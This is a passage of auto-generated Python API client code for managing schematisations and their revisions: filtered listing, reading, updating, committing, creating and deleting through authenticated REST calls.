if 'name__endswith' in local_var_params and local_var_params['name__endswith'] is not None: # noqa: E501
query_params.append(('name__endswith', local_var_params['name__endswith'])) # noqa: E501
if 'name__regex' in local_var_params and local_var_params['name__regex'] is not None: # noqa: E501
query_params.append(('name__regex', local_var_params['name__regex'])) # noqa: E501
if 'slug' in local_var_params and local_var_params['slug'] is not None: # noqa: E501
query_params.append(('slug', local_var_params['slug'])) # noqa: E501
if 'slug__iexact' in local_var_params and local_var_params['slug__iexact'] is not None: # noqa: E501
query_params.append(('slug__iexact', local_var_params['slug__iexact'])) # noqa: E501
if 'slug__contains' in local_var_params and local_var_params['slug__contains'] is not None: # noqa: E501
query_params.append(('slug__contains', local_var_params['slug__contains'])) # noqa: E501
if 'slug__icontains' in local_var_params and local_var_params['slug__icontains'] is not None: # noqa: E501
query_params.append(('slug__icontains', local_var_params['slug__icontains'])) # noqa: E501
if 'slug__in' in local_var_params and local_var_params['slug__in'] is not None: # noqa: E501
query_params.append(('slug__in', local_var_params['slug__in'])) # noqa: E501
if 'slug__startswith' in local_var_params and local_var_params['slug__startswith'] is not None: # noqa: E501
query_params.append(('slug__startswith', local_var_params['slug__startswith'])) # noqa: E501
if 'slug__istartswith' in local_var_params and local_var_params['slug__istartswith'] is not None: # noqa: E501
query_params.append(('slug__istartswith', local_var_params['slug__istartswith'])) # noqa: E501
if 'slug__endswith' in local_var_params and local_var_params['slug__endswith'] is not None: # noqa: E501
query_params.append(('slug__endswith', local_var_params['slug__endswith'])) # noqa: E501
if 'slug__regex' in local_var_params and local_var_params['slug__regex'] is not None: # noqa: E501
query_params.append(('slug__regex', local_var_params['slug__regex'])) # noqa: E501
if 'owner__name' in local_var_params and local_var_params['owner__name'] is not None: # noqa: E501
query_params.append(('owner__name', local_var_params['owner__name'])) # noqa: E501
if 'owner__name__iexact' in local_var_params and local_var_params['owner__name__iexact'] is not None: # noqa: E501
query_params.append(('owner__name__iexact', local_var_params['owner__name__iexact'])) # noqa: E501
if 'owner__name__contains' in local_var_params and local_var_params['owner__name__contains'] is not None: # noqa: E501
query_params.append(('owner__name__contains', local_var_params['owner__name__contains'])) # noqa: E501
if 'owner__name__icontains' in local_var_params and local_var_params['owner__name__icontains'] is not None: # noqa: E501
query_params.append(('owner__name__icontains', local_var_params['owner__name__icontains'])) # noqa: E501
if 'owner__name__in' in local_var_params and local_var_params['owner__name__in'] is not None: # noqa: E501
query_params.append(('owner__name__in', local_var_params['owner__name__in'])) # noqa: E501
if 'owner__name__startswith' in local_var_params and local_var_params['owner__name__startswith'] is not None: # noqa: E501
query_params.append(('owner__name__startswith', local_var_params['owner__name__startswith'])) # noqa: E501
if 'owner__name__istartswith' in local_var_params and local_var_params['owner__name__istartswith'] is not None: # noqa: E501
query_params.append(('owner__name__istartswith', local_var_params['owner__name__istartswith'])) # noqa: E501
if 'owner__name__endswith' in local_var_params and local_var_params['owner__name__endswith'] is not None: # noqa: E501
query_params.append(('owner__name__endswith', local_var_params['owner__name__endswith'])) # noqa: E501
if 'owner__name__regex' in local_var_params and local_var_params['owner__name__regex'] is not None: # noqa: E501
query_params.append(('owner__name__regex', local_var_params['owner__name__regex'])) # noqa: E501
if 'owner__unique_id' in local_var_params and local_var_params['owner__unique_id'] is not None: # noqa: E501
query_params.append(('owner__unique_id', local_var_params['owner__unique_id'])) # noqa: E501
if 'owner__unique_id__iexact' in local_var_params and local_var_params['owner__unique_id__iexact'] is not None: # noqa: E501
query_params.append(('owner__unique_id__iexact', local_var_params['owner__unique_id__iexact'])) # noqa: E501
if 'owner__unique_id__contains' in local_var_params and local_var_params['owner__unique_id__contains'] is not None: # noqa: E501
query_params.append(('owner__unique_id__contains', local_var_params['owner__unique_id__contains'])) # noqa: E501
if 'owner__unique_id__icontains' in local_var_params and local_var_params['owner__unique_id__icontains'] is not None: # noqa: E501
query_params.append(('owner__unique_id__icontains', local_var_params['owner__unique_id__icontains'])) # noqa: E501
if 'owner__unique_id__in' in local_var_params and local_var_params['owner__unique_id__in'] is not None: # noqa: E501
query_params.append(('owner__unique_id__in', local_var_params['owner__unique_id__in'])) # noqa: E501
if 'owner__unique_id__startswith' in local_var_params and local_var_params['owner__unique_id__startswith'] is not None: # noqa: E501
query_params.append(('owner__unique_id__startswith', local_var_params['owner__unique_id__startswith'])) # noqa: E501
if 'owner__unique_id__istartswith' in local_var_params and local_var_params['owner__unique_id__istartswith'] is not None: # noqa: E501
query_params.append(('owner__unique_id__istartswith', local_var_params['owner__unique_id__istartswith'])) # noqa: E501
if 'owner__unique_id__endswith' in local_var_params and local_var_params['owner__unique_id__endswith'] is not None: # noqa: E501
query_params.append(('owner__unique_id__endswith', local_var_params['owner__unique_id__endswith'])) # noqa: E501
if 'owner__unique_id__regex' in local_var_params and local_var_params['owner__unique_id__regex'] is not None: # noqa: E501
query_params.append(('owner__unique_id__regex', local_var_params['owner__unique_id__regex'])) # noqa: E501
if 'tags__in' in local_var_params and local_var_params['tags__in'] is not None: # noqa: E501
query_params.append(('tags__in', local_var_params['tags__in'])) # noqa: E501
if 'ordering' in local_var_params and local_var_params['ordering'] is not None: # noqa: E501
query_params.append(('ordering', local_var_params['ordering'])) # noqa: E501
if 'limit' in local_var_params and local_var_params['limit'] is not None: # noqa: E501
query_params.append(('limit', local_var_params['limit'])) # noqa: E501
if 'offset' in local_var_params and local_var_params['offset'] is not None: # noqa: E501
query_params.append(('offset', local_var_params['offset'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/schematisations/', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse200', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def schematisations_partial_update(self, id, data, **kwargs): # noqa: E501
"""schematisations_partial_update # noqa: E501
Manage schematisations # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_partial_update(id, data, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this schematisation. (required)
:param Schematisation data: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Schematisation
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.schematisations_partial_update_with_http_info(id, data, **kwargs) # noqa: E501
def schematisations_partial_update_with_http_info(self, id, data, **kwargs): # noqa: E501
"""schematisations_partial_update # noqa: E501
Manage schematisations # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_partial_update_with_http_info(id, data, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this schematisation. (required)
:param Schematisation data: (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(Schematisation, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id',
'data'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method schematisations_partial_update" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `schematisations_partial_update`") # noqa: E501
# verify the required parameter 'data' is set
if self.api_client.client_side_validation and ('data' not in local_var_params or # noqa: E501
local_var_params['data'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `data` when calling `schematisations_partial_update`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in local_var_params:
body_params = local_var_params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/schematisations/{id}/', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Schematisation', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def schematisations_read(self, id, **kwargs): # noqa: E501
"""schematisations_read # noqa: E501
Manage schematisations # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_read(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this schematisation. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Schematisation
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.schematisations_read_with_http_info(id, **kwargs) # noqa: E501
def schematisations_read_with_http_info(self, id, **kwargs): # noqa: E501
"""schematisations_read # noqa: E501
Manage schematisations # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_read_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this schematisation. (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(Schematisation, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method schematisations_read" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `schematisations_read`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/schematisations/{id}/', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Schematisation', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def schematisations_revisions_check(self, id, schematisation_pk, data, **kwargs): # noqa: E501
"""schematisations_revisions_check # noqa: E501
Manage revisions of schematisations. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_check(id, schematisation_pk, data, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this revision. (required)
:param str schematisation_pk: (required)
:param SchematisationRevision data: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: RevisionTask
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.schematisations_revisions_check_with_http_info(id, schematisation_pk, data, **kwargs) # noqa: E501
def schematisations_revisions_check_with_http_info(self, id, schematisation_pk, data, **kwargs): # noqa: E501
"""schematisations_revisions_check # noqa: E501
Manage revisions of schematisations. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_check_with_http_info(id, schematisation_pk, data, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this revision. (required)
:param str schematisation_pk: (required)
:param SchematisationRevision data: (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(RevisionTask, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id',
'schematisation_pk',
'data'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method schematisations_revisions_check" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `schematisations_revisions_check`") # noqa: E501
# verify the required parameter 'schematisation_pk' is set
if self.api_client.client_side_validation and ('schematisation_pk' not in local_var_params or # noqa: E501
local_var_params['schematisation_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `schematisation_pk` when calling `schematisations_revisions_check`") # noqa: E501
# verify the required parameter 'data' is set
if self.api_client.client_side_validation and ('data' not in local_var_params or # noqa: E501
local_var_params['data'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `data` when calling `schematisations_revisions_check`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'schematisation_pk' in local_var_params:
path_params['schematisation_pk'] = local_var_params['schematisation_pk'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in local_var_params:
body_params = local_var_params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/schematisations/{schematisation_pk}/revisions/{id}/check/', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='RevisionTask', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def schematisations_revisions_commit(self, id, schematisation_pk, data, **kwargs): # noqa: E501
"""Commit the revision # noqa: E501
The `commit_message` can be used to describe the changes. The `force_as` parameter allows to override the default behaviour of committing the revision with the already assigned revision number. In case another user has already committed a revision with the same number, an HTTP 409 status code is returned. In this case you can either: 1) Save the revision with a higher revision number using `force_as` = `new_revision`, effectively overwriting changes from the other user. 2) Save the revision under a new schematisation using `force_as` = `new_schematisation` and specifying a `schematisation_name`. If you want to merge your changes with the changes from the other user, you need to download his/hers revision locally and merge it yourselves. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_commit(id, schematisation_pk, data, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this revision. (required)
:param str schematisation_pk: (required)
:param Commit data: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: SchematisationRevision
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.schematisations_revisions_commit_with_http_info(id, schematisation_pk, data, **kwargs) # noqa: E501
def schematisations_revisions_commit_with_http_info(self, id, schematisation_pk, data, **kwargs): # noqa: E501
"""Commit the revision # noqa: E501
The `commit_message` can be used to describe the changes. The `force_as` parameter allows to override the default behaviour of committing the revision with the already assigned revision number. In case another user has already committed a revision with the same number, an HTTP 409 status code is returned. In this case you can either: 1) Save the revision with a higher revision number using `force_as` = `new_revision`, effectively overwriting changes from the other user. 2) Save the revision under a new schematisation using `force_as` = `new_schematisation` and specifying a `schematisation_name`. If you want to merge your changes with the changes from the other user, you need to download his/hers revision locally and merge it yourselves. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_commit_with_http_info(id, schematisation_pk, data, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this revision. (required)
:param str schematisation_pk: (required)
:param Commit data: (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(SchematisationRevision, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id',
'schematisation_pk',
'data'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method schematisations_revisions_commit" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `schematisations_revisions_commit`") # noqa: E501
# verify the required parameter 'schematisation_pk' is set
if self.api_client.client_side_validation and ('schematisation_pk' not in local_var_params or # noqa: E501
local_var_params['schematisation_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `schematisation_pk` when calling `schematisations_revisions_commit`") # noqa: E501
# verify the required parameter 'data' is set
if self.api_client.client_side_validation and ('data' not in local_var_params or # noqa: E501
local_var_params['data'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `data` when calling `schematisations_revisions_commit`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'schematisation_pk' in local_var_params:
path_params['schematisation_pk'] = local_var_params['schematisation_pk'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in local_var_params:
body_params = local_var_params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/schematisations/{schematisation_pk}/revisions/{id}/commit/', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SchematisationRevision', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def schematisations_revisions_create(self, schematisation_pk, data, **kwargs): # noqa: E501
"""Create a new revision # noqa: E501
Creates a clone of the last committed revision (if present) by default except when empty=true is passed in the data. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_create(schematisation_pk, data, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str schematisation_pk: (required)
:param CreateRevision data: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: SchematisationRevision
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.schematisations_revisions_create_with_http_info(schematisation_pk, data, **kwargs) # noqa: E501
def schematisations_revisions_create_with_http_info(self, schematisation_pk, data, **kwargs): # noqa: E501
"""Create a new revision # noqa: E501
Creates a clone of the last committed revision (if present) by default except when empty=true is passed in the data. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_create_with_http_info(schematisation_pk, data, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str schematisation_pk: (required)
:param CreateRevision data: (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(SchematisationRevision, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'schematisation_pk',
'data'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method schematisations_revisions_create" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'schematisation_pk' is set
if self.api_client.client_side_validation and ('schematisation_pk' not in local_var_params or # noqa: E501
local_var_params['schematisation_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `schematisation_pk` when calling `schematisations_revisions_create`") # noqa: E501
# verify the required parameter 'data' is set
if self.api_client.client_side_validation and ('data' not in local_var_params or # noqa: E501
local_var_params['data'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `data` when calling `schematisations_revisions_create`") # noqa: E501
collection_formats = {}
path_params = {}
if 'schematisation_pk' in local_var_params:
path_params['schematisation_pk'] = local_var_params['schematisation_pk'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in local_var_params:
body_params = local_var_params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/schematisations/{schematisation_pk}/revisions/', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SchematisationRevision', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def schematisations_revisions_create_threedimodel(self, id, schematisation_pk, data, **kwargs): # noqa: E501
"""schematisations_revisions_create_threedimodel # noqa: E501
Manage revisions of schematisations. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_create_threedimodel(id, schematisation_pk, data, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this revision. (required)
:param str schematisation_pk: (required)
:param SchematisationRevision data: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: ThreediModel
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.schematisations_revisions_create_threedimodel_with_http_info(id, schematisation_pk, data, **kwargs) # noqa: E501
def schematisations_revisions_create_threedimodel_with_http_info(self, id, schematisation_pk, data, **kwargs): # noqa: E501
"""schematisations_revisions_create_threedimodel # noqa: E501
Manage revisions of schematisations. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_create_threedimodel_with_http_info(id, schematisation_pk, data, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this revision. (required)
:param str schematisation_pk: (required)
:param SchematisationRevision data: (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(ThreediModel, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id',
'schematisation_pk',
'data'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method schematisations_revisions_create_threedimodel" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `schematisations_revisions_create_threedimodel`") # noqa: E501
# verify the required parameter 'schematisation_pk' is set
if self.api_client.client_side_validation and ('schematisation_pk' not in local_var_params or # noqa: E501
local_var_params['schematisation_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `schematisation_pk` when calling `schematisations_revisions_create_threedimodel`") # noqa: E501
# verify the required parameter 'data' is set
if self.api_client.client_side_validation and ('data' not in local_var_params or # noqa: E501
local_var_params['data'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `data` when calling `schematisations_revisions_create_threedimodel`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'schematisation_pk' in local_var_params:
path_params['schematisation_pk'] = local_var_params['schematisation_pk'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in local_var_params:
body_params = local_var_params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/schematisations/{schematisation_pk}/revisions/{id}/create_threedimodel/', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ThreediModel', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def schematisations_revisions_delete(self, id, schematisation_pk, data, **kwargs): # noqa: E501
"""schematisations_revisions_delete # noqa: E501
Provide the revision id to delete the revision # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_delete(id, schematisation_pk, data, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this revision. (required)
:param str schematisation_pk: (required)
:param DestroyRevision data: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.schematisations_revisions_delete_with_http_info(id, schematisation_pk, data, **kwargs) # noqa: E501
def schematisations_revisions_delete_with_http_info(self, id, schematisation_pk, data, **kwargs): # noqa: E501
"""schematisations_revisions_delete # noqa: E501
Provide the revision id to delete the revision # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
